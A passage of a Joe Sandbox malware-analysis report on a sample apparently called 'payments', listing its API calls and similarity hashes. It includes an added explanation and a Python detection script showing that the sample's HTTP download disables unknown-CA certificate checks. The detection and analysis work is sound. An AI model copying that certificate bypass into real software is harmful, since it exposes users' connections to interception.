• CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00CF8F3F
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CF8F50
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CFBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00CF8F8A
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CF8FAA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID: @U=u
• API String ID: 3864802216-2594219639
• Opcode ID: 37b2b0540f0641392b681a3460a3b917688dc6766485564b8708b56b9121387e
• Instruction ID: a9bfd5096ca1c0da02ed56ec45b31547d5bdab98a94a8b6524054fe9c1126668
• Opcode Fuzzy Hash: 37b2b0540f0641392b681a3460a3b917688dc6766485564b8708b56b9121387e
• Instruction Fuzzy Hash: 10317F72200218BFEB108F50CC4AFEA3BAEEF49715F044065FE09DA291CB759842CB70
APIs
• VariantInit.OLEAUT32(?), ref: 00CEB2D5
• CoInitialize.OLE32(00000000), ref: 00CEB302
• CoUninitialize.OLE32 ref: 00CEB30C
• GetRunningObjectTable.OLE32(00000000,?), ref: 00CEB40C
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00CEB539
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00CEB56D
• CoGetObject.OLE32(?,00000000,00D1D91C,?), ref: 00CEB590
• SetErrorMode.KERNEL32(00000000), ref: 00CEB5A3
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CEB623
• VariantClear.OLEAUT32(00D1D91C), ref: 00CEB633
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: e8de1be0fcb6091536ecf7355106ce4383414fea208a2452373c073f3c7e1d9c
• Instruction ID: cfb5b49448a33318f285e0657b005fcc460f72f945935d4be942caab39879735
• Opcode Fuzzy Hash: e8de1be0fcb6091536ecf7355106ce4383414fea208a2452373c073f3c7e1d9c
• Instruction Fuzzy Hash: 28C103B1608341AFC700DF65C88596BB7E9BF88308F00495DF59ADB251DB71ED45CB52
APIs
• __swprintf.LIBCMT ref: 00CD67FD
• __swprintf.LIBCMT ref: 00CD680A
  • Part of subcall function 00CB172B: __woutput_l.LIBCMT ref: 00CB1784
• FindResourceW.KERNEL32(?,?,0000000E), ref: 00CD6834
• LoadResource.KERNEL32(?,00000000), ref: 00CD6840
• LockResource.KERNEL32(00000000), ref: 00CD684D
• FindResourceW.KERNEL32(?,?,00000003), ref: 00CD686D
• LoadResource.KERNEL32(?,00000000), ref: 00CD687F
• SizeofResource.KERNEL32(?,00000000), ref: 00CD688E
• LockResource.KERNEL32(?), ref: 00CD689A
• CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CD68F9
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
• String ID:
• API String ID: 1433390588-0
• Opcode ID: 54412b6fbdbe04b64fb013deca1c45b4fefef642b2e04e48501d4218d49eb34d
• Instruction ID: 8ff27ad042aaf3451f7c0322f4a81b8056bded2da15c6334deaaaae0886de0f4
• Opcode Fuzzy Hash: 54412b6fbdbe04b64fb013deca1c45b4fefef642b2e04e48501d4218d49eb34d
• Instruction Fuzzy Hash: E931827190031AABDB109F61DD55AFB7BA9EF08341F008426FA11D6290EB34DA12EB74
APIs
• GetCurrentThreadId.KERNEL32 ref: 00CD4047
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD405B
• GetWindowThreadProcessId.USER32(00000000), ref: 00CD4062
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD4071
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD4083
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD409C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD40AE
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD40F3
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD4108
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00CD30A5,?,00000001), ref: 00CD4113
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 7113c426bf94beadf27a36e14b918c4e3c86b1d3b671fd1c348aab41a603aece
• Instruction ID: 1c6d32b3ffbd569120bff7cc187e042b5385dc60cc5af99e975cb36fdd7c826c
• Opcode Fuzzy Hash: 7113c426bf94beadf27a36e14b918c4e3c86b1d3b671fd1c348aab41a603aece
• Instruction Fuzzy Hash: 7E313C71500304BBDB15DB54DC8ABB977AAAB64392F108117FF15E6390DBB4AA818B70
APIs
  • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
• GetSystemMetrics.USER32(0000000F), ref: 00D0016D
• MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00D0038D
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00D003AB
• InvalidateRect.USER32(?,00000000,00000001,?), ref: 00D003D6
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00D003FF
• ShowWindow.USER32(00000003,00000000), ref: 00D00421
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00D00440
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
• String ID: @U=u
• API String ID: 3356174886-2594219639
• Opcode ID: b2b948c053680f19bcfdea2c496b79aa859fd997b4b83d13a1524ca3ff27636f
• Instruction ID: 211e9d4e1f38b1ece9378c242d50f2eca04d88a2e5e7ba03bfda28a8872b733b
• Opcode Fuzzy Hash: b2b948c053680f19bcfdea2c496b79aa859fd997b4b83d13a1524ca3ff27636f
• Instruction Fuzzy Hash: F0A19E35600616FFDB19CF68C9857BDBBB2BF08701F088115ED58A7290DB74AD51CBA0
APIs
• EnumChildWindows.USER32(?,00CCCF50), ref: 00CCCE90
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: 01033061a5262b801157f62f19cc3581b4dd735a4b56370024be468ef074c70c
• Instruction ID: c867afdf509962c7fb6d949fae39cbbb21f3928eeeedea536887a675b7504080
• Opcode Fuzzy Hash: 01033061a5262b801157f62f19cc3581b4dd735a4b56370024be468ef074c70c
• Instruction Fuzzy Hash: AB914E30600506ABCB18EFA0C4D1BEAFB65FF05314F54855DE85EA7291DF306A5AEBE0
                                                                                                                          APIs
                                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C930DC
                                                                                                                          • CoUninitialize.OLE32(?,00000000), ref: 00C93181
                                                                                                                          • UnregisterHotKey.USER32(?), ref: 00C932A9
                                                                                                                          • DestroyWindow.USER32(?), ref: 00D05079
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00D050F8
                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D05125
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                          • String ID: close all
                                                                                                                          • API String ID: 469580280-3243417748
                                                                                                                          • Opcode ID: 8d044a3cd4ef124e6d00caa56985f4afda7193ed768623fe5a54587afb664af9
                                                                                                                          • Instruction ID: 7c5cee13b369267ce493a59a08a865e8a8c41ac0a72dff134cab58e49559fc2f
                                                                                                                          • Opcode Fuzzy Hash: 8d044a3cd4ef124e6d00caa56985f4afda7193ed768623fe5a54587afb664af9
                                                                                                                          • Instruction Fuzzy Hash: 3D914C34600242DFCB19EF14D999B69F3B4FF04304F5582A9E90AA72A2DF30AE56DF54
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CF9B19
                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00CF9B2D
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CF9B47
                                                                                                                          • _wcscat.LIBCMT ref: 00CF9BA2
                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CF9BB9
                                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CF9BE7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window_wcscat
                                                                                                                          • String ID: @U=u$SysListView32
                                                                                                                          • API String ID: 307300125-1908207174
                                                                                                                          • Opcode ID: 38c09c9d560442ade902690dcfe192c18a9a45a13f651f4cd45de8324680a4d9
                                                                                                                          • Instruction ID: 9fb3311ee3756c39abb92caf8a2ffc87d3024705f955f7dcc4f63cc318f6f824
                                                                                                                          • Opcode Fuzzy Hash: 38c09c9d560442ade902690dcfe192c18a9a45a13f651f4cd45de8324680a4d9
                                                                                                                          • Instruction Fuzzy Hash: 5341AD70A0030CABDF219FA4DC85BEE77A9EF08350F10442AF659E7291D7719E85DB61
                                                                                                                          APIs
                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CE45FF
                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CE462B
                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00CE466D
                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CE4682
                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CE468F
                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00CE46BF
                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00CE4706
                                                                                                                            • Part of subcall function 00CE5052: GetLastError.KERNEL32(?,?,00CE43CC,00000000,00000000,00000001), ref: 00CE5067
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1241431887-3916222277
                                                                                                                          • Opcode ID: 2e3423d521db0ec7b3ad9d042a2aabf98c138ab3b6905ddaf74b803acf0a0531
                                                                                                                          • Instruction ID: 003f82e37d2383615fd8890439003cba55cb75c72c72800eec1226db0940b175
                                                                                                                          • Opcode Fuzzy Hash: 2e3423d521db0ec7b3ad9d042a2aabf98c138ab3b6905ddaf74b803acf0a0531
                                                                                                                          • Instruction Fuzzy Hash: B1419DB1501244BFEB169F51CC89FFB77ACFF09304F008016FA15DA181DBB49A459BA4
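The WinINet sequence in the entry above (connect, open request, query and then set option 0x1F, send, query info level 5) is the security-relevant part of this function: option 0x1F is INTERNET_OPTION_SECURITY_FLAGS, and the value 0x100 written back is SECURITY_FLAG_IGNORE_UNKNOWN_CA, which makes the download accept a server certificate chained to an unknown CA; info level 5 is HTTP_QUERY_CONTENT_LENGTH. The following script is an added example, not part of the Joe Sandbox report or of the sample: it parses API bullets in the plugin's format, decodes these constants (values taken from wininet.h), and flags any InternetSetOption call that clears certificate checks. The sample lines are copied from the entry above and labelled as constructed input; the interpretation of the third InternetSetOptionW operand as the DWORD stored through lpBuffer is an assumption about how the plugin recovered that argument.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constants from <wininet.h> (values as documented by Microsoft).
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAG_BITS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
HTTP_QUERY_NAMES = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}

# One "APIs" bullet as printed by the Joe Sandbox IDA plugin. Subcall bullets carry a
# "Part of subcall function <addr>:" prefix; CRT bullets (e.g. _wcscat.LIBCMT) have no args.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # None where the plugin printed '?'
    ref: int                    # call-site address
    subcall_of: Optional[int]   # callee address when the bullet is a subcall line

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args: List[Optional[int]] = []
        if m.group("args"):
            for a in m.group("args").split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))
        sub = m.group("sub")
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls

def describe_security_flags(value: int) -> List[str]:
    """Name every SECURITY_FLAG_IGNORE_* bit set in value; unknown bits are kept as hex."""
    names = [n for bit, n in SECURITY_FLAG_BITS.items() if value & bit]
    rest = value & ~sum(SECURITY_FLAG_BITS)
    if rest:
        names.append(f"0x{rest:08X}")
    return names

def find_tls_validation_bypass(calls: List[ApiCall]) -> List[Tuple[int, str, List[str]]]:
    """InternetSetOption(h, INTERNET_OPTION_SECURITY_FLAGS, value, 4) with any IGNORE bit.
    Assumption: the third recovered operand is the DWORD the caller stores through
    lpBuffer; when the plugin printed '?', the call is reported as unresolved."""
    findings = []
    for c in calls:
        if c.name not in ("InternetSetOptionW", "InternetSetOptionA") or len(c.args) < 3:
            continue
        if c.args[1] != INTERNET_OPTION_SECURITY_FLAGS:
            continue
        if c.args[2] is None:
            findings.append((c.ref, "unresolved", []))
            continue
        ignored = describe_security_flags(c.args[2])
        if ignored:
            findings.append((c.ref, "ignores", ignored))
    return findings

def annotate(calls: List[ApiCall]) -> List[str]:
    """Trace lines with the numeric option / info-level arguments decoded to their names."""
    out = []
    for c in calls:
        note = ""
        if (c.name.startswith(("InternetQueryOption", "InternetSetOption"))
                and len(c.args) > 1 and c.args[1] == INTERNET_OPTION_SECURITY_FLAGS):
            note = " INTERNET_OPTION_SECURITY_FLAGS"
        elif c.name.startswith("HttpQueryInfo") and len(c.args) > 1 and c.args[1] in HTTP_QUERY_NAMES:
            note = " " + HTTP_QUERY_NAMES[c.args[1]]
        out.append(f"{c.ref:08X} {c.name}{note}")
    return out

# Constructed input: the seven API bullets of the WinINet function above plus its subcall line.
SAMPLE = """
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CE45FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CE462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00CE466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CE4682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CE468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00CE46BF
• InternetCloseHandle.WININET(00000000), ref: 00CE4706
  • Part of subcall function 00CE5052: GetLastError.KERNEL32(?,?,00CE43CC,00000000,00000000,00000001), ref: 00CE5067
"""

if __name__ == "__main__":
    trace = parse_api_lines(SAMPLE)
    print("\n".join(annotate(trace)))
    for ref, verdict, flags in find_tls_validation_bypass(trace):
        print(f"{ref:08X}: certificate validation {verdict} {', '.join(flags)}")
```

Run on the entry above, the script reports the call at 00CE4682 as ignoring SECURITY_FLAG_IGNORE_UNKNOWN_CA. The query-then-set pattern (read the current flags, OR in a bit, write them back) is how a download routine is usually made tolerant of untrusted certificates, so a detection note for this sample should record that its HTTPS fetches do not require a trusted CA, and any TLS-interception or proxy-based check cannot rely on the client refusing an unknown issuer.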
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CF8FE7
                                                                                                                          • GetWindowLongW.USER32(00E8CF70,000000F0), ref: 00CF901A
                                                                                                                          • GetWindowLongW.USER32(00E8CF70,000000F0), ref: 00CF904F
                                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CF9081
                                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CF90AB
                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00CF90BC
                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CF90D6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 2178440468-2594219639
                                                                                                                          • Opcode ID: a0e189bf82af2b142436c2be02fe70ba1cd1bccc42bfe18dc42c1da0001587c2
                                                                                                                          • Instruction ID: d414f2d533e63fa49921133c51a290ded59d274a58a5c07a0f48b70664975d59
                                                                                                                          • Opcode Fuzzy Hash: a0e189bf82af2b142436c2be02fe70ba1cd1bccc42bfe18dc42c1da0001587c2
                                                                                                                          • Instruction Fuzzy Hash: 7A312638600219EFDF608F58DC85FA437A5FB4A714F144164FA29CB2B2CF71A945DB62
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00D2DC00), ref: 00CEB715
                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00D2DC00), ref: 00CEB749
                                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CEB8C1
                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00CEB8EB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 560350794-0
                                                                                                                          • Opcode ID: 9fb9c184fa335ad03d0f594ed8116498b813555205e264928d7b4ae43237638c
                                                                                                                          • Instruction ID: 7a3e6e2a739bcf691ae337d032570338759119b4bae9909f5259b456852980cb
                                                                                                                          • Opcode Fuzzy Hash: 9fb9c184fa335ad03d0f594ed8116498b813555205e264928d7b4ae43237638c
                                                                                                                          • Instruction Fuzzy Hash: 2CF12871A00249AFCF14DF95C888EBEB7B9FF48315F108469F915AB250DB31AE45DB90
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CF24F5
                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CF2688
                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CF26AC
                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CF26EC
                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CF270E
                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CF286F
                                                                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CF28A1
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CF28D0
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CF2947
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4090791747-0
                                                                                                                          • Opcode ID: a65a040bdb0a62cd5d55dca37fa312d6287651f173c2c13dfca96abeb2bbf17c
                                                                                                                          • Instruction ID: cf1d1bc3955de98d989cd93cfe6a8c7225e71830e3c803a706ec8a713ebda4bc
                                                                                                                          • Opcode Fuzzy Hash: a65a040bdb0a62cd5d55dca37fa312d6287651f173c2c13dfca96abeb2bbf17c
